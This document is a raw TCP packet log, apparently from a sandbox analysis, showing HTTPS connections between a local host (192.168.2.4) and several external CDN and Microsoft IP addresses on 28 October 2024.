                                                                            Oct 28, 2024 09:37:04.815888882 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.815922022 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.816287041 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.816333055 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.816343069 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.816378117 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.816777945 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.816792965 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.816828966 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.935455084 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.935543060 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.935555935 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.935841084 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.936021090 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.936120987 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.936211109 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.936288118 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.937043905 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:04.937099934 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:04.969281912 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.969933033 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.969954967 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.970287085 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.970918894 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:04.970983982 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:04.974041939 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:05.015407085 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:05.055382967 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:05.055433035 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:05.055501938 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:05.055571079 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:05.055577993 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:05.055643082 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:05.055682898 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:05.057754993 CET49807443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:05.057770967 CET44349807104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:05.106312037 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:05.106403112 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:05.106594086 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:05.114336014 CET49817443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:05.114355087 CET44349817104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:05.284842968 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.291266918 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.291357040 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.292139053 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.292152882 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.298863888 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.299304962 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.299449921 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.299525976 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.301086903 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.302432060 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.302447081 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.303033113 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.303103924 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.304383039 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.304395914 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.305296898 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.305330992 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.306046963 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.306057930 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.337275982 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.337857962 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.337937117 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.338572025 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.338603020 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.418210030 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.419116974 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.419300079 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.432122946 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.432370901 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.432440996 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.432707071 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.432928085 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.435364008 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.473273039 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.473407984 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.473539114 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:05.638238907 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.638457060 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:05.638829947 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.146476030 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.146476030 CET49818443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.146500111 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.146548986 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.146584034 CET49820443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.146624088 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.146636009 CET4434982013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.146673918 CET4434981813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.147013903 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.147013903 CET49819443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.147079945 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.147111893 CET4434981913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.148272038 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.148272991 CET49821443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.148335934 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.148367882 CET4434982113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.149367094 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.149367094 CET49822443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.149389029 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.149413109 CET4434982213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.152631044 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.152705908 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.152777910 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.153016090 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.153050900 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.153265953 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.153306007 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.153438091 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.156486988 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.156505108 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.157789946 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.157812119 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.157838106 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.157871008 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.157872915 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.157932997 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.158066988 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.158092022 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.158713102 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.158724070 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.160872936 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.160901070 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.160959959 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.161139011 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.161153078 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.796319962 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:06.796401024 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:06.796611071 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:06.796689034 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:06.796808004 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:06.796832085 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:06.797198057 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:06.797280073 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:06.797425985 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:06.797461987 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:06.884753942 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.885730982 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.885804892 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.887137890 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.887151003 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.890955925 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.891751051 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.891772985 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.892533064 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.892538071 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.892836094 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.895492077 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.895523071 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.896708965 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.896718979 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.899005890 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.899502993 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.899530888 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.900475979 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.900480986 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.904638052 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.905481100 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.905531883 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:06.906382084 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:06.906394958 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.014306068 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.014511108 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.014597893 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.015043974 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.015088081 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.015119076 CET49825443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.015134096 CET4434982513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.019701004 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.019917011 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.019989014 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.022641897 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.022713900 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.022777081 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.022941113 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.022958040 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.022983074 CET49826443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.022993088 CET4434982613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.025451899 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.025482893 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.027957916 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.028017998 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.028096914 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.028280973 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.028433084 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.028491020 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.028548956 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.028572083 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.028887033 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.028903008 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.028933048 CET49829443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.028938055 CET4434982913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.029962063 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.030108929 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.030162096 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.031347036 CET49828443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.031363964 CET4434982813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.035408974 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.035556078 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.035628080 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.036346912 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.036413908 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.036520958 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.038954973 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.039036036 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.039114952 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.039391041 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.039413929 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.039446115 CET49827443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.039458990 CET4434982713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.041415930 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.041466951 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.041677952 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.041709900 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.044868946 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.044888973 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.044970989 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.045214891 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.045238972 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.403892040 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.404369116 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.404400110 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.405874014 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.405945063 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.406687021 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.406770945 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.407319069 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.407327890 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.431425095 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.431924105 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.431988955 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.435556889 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.435626030 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.436202049 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.436317921 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.436328888 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.436378956 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.457011938 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.477432966 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.477452040 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.519375086 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.542807102 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.577874899 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578026056 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578073025 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.578094006 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578198910 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578279018 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.578286886 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578315020 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578356028 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.578401089 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578550100 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.578593969 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.578607082 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.582343102 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.582381010 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.630700111 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.630707979 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.630726099 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.659945011 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660020113 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660059929 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660075903 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.660105944 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660156012 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.660171032 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660351992 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660410881 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.660424948 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660501957 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.660550117 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.660562992 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.661310911 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.661350012 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.661367893 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.661382914 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.661459923 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.661955118 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.676553011 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.699409962 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.699728012 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.699800968 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.699810028 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.699866056 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.699918032 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.699964046 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.700289011 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.700359106 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.700372934 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.700541973 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.700588942 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.700601101 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.707640886 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.707699060 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.741238117 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.741254091 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.753685951 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.773945093 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.774024963 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.774595022 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.774597883 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.774631023 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.774672031 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.775091887 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.775104046 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.775276899 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.775290966 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.776763916 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.776837111 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.776895046 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.776911974 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.778176069 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.778213978 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.778248072 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.778264046 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.778323889 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.778336048 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.784301996 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.790364027 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.790730000 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.790757895 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.791172028 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.791182995 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.807774067 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.808084011 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.808103085 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.808456898 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.808464050 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.821733952 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.821908951 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.821973085 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.822009087 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.822103977 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.822154045 CET49831443192.168.2.4104.17.25.14
